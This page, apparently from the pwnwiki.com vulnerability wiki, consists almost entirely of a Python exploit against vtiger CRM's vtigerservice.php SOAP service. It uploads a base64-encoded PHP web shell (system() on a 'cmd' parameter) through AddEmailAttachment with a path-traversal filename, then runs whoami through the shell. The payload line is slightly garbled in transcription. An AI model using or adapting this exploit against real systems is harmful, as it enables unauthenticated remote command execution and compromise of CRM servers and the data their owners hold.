pwnwiki.com
,
EXP
#!/usr/bin/env python3
import requests
from base64 import b64encode
# parameters depend on environment.
host = '192.168.85.133'
port = 8888
uri = '/'
url = f'http://{host}:{port}{uri}vtigerservice.php?service=outlook'
headers = {'Content-Type': 'text/xml', 'charset': 'UTF-8'}
payload = """
<?php
if(isset($_REQUEST'cmd')){
echo "<pre>";
$cmd = ($_REQUEST'cmd');
system($cmd);
echo "
";
die;
}
?>
"""
encoded_payload = b64encode(payload.encode()).decode()
filename = "cmd.php"
data = f"""
<soapenv:Envelope xmlns:crm="http://www.vtiger.com/products/crm" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header/>
<soapenv:Body>
<crm:AddEmailAttachment soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<emailid xsi:type="xsd:string">ptFINT</emailid>
<filedata xsi:type="xsd:string">{encoded_payload}</filedata>
<filename xsi:type="xsd:string">../../../../../../{filename}</filename>
<filesize xsi:type="xsd:string">{len(payload)}</filesize>
<filetype xsi:type="xsd:string">php</filetype>
<username xsi:type="xsd:string">Pbghh</username>
<session xsi:type="xsd:string"/>
</crm:AddEmailAttachment>
</soapenv:Body>
</soapenv:Envelope>
"""
- send the requests
print("Sending ...")
print(data)
requests.post(url, headers=headers, data=data)
print("Test command whoami ...")
resp = requests.get(f'http://{host}:{port}{uri}{filename}?cmd=whoami')
print(resp.text)
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
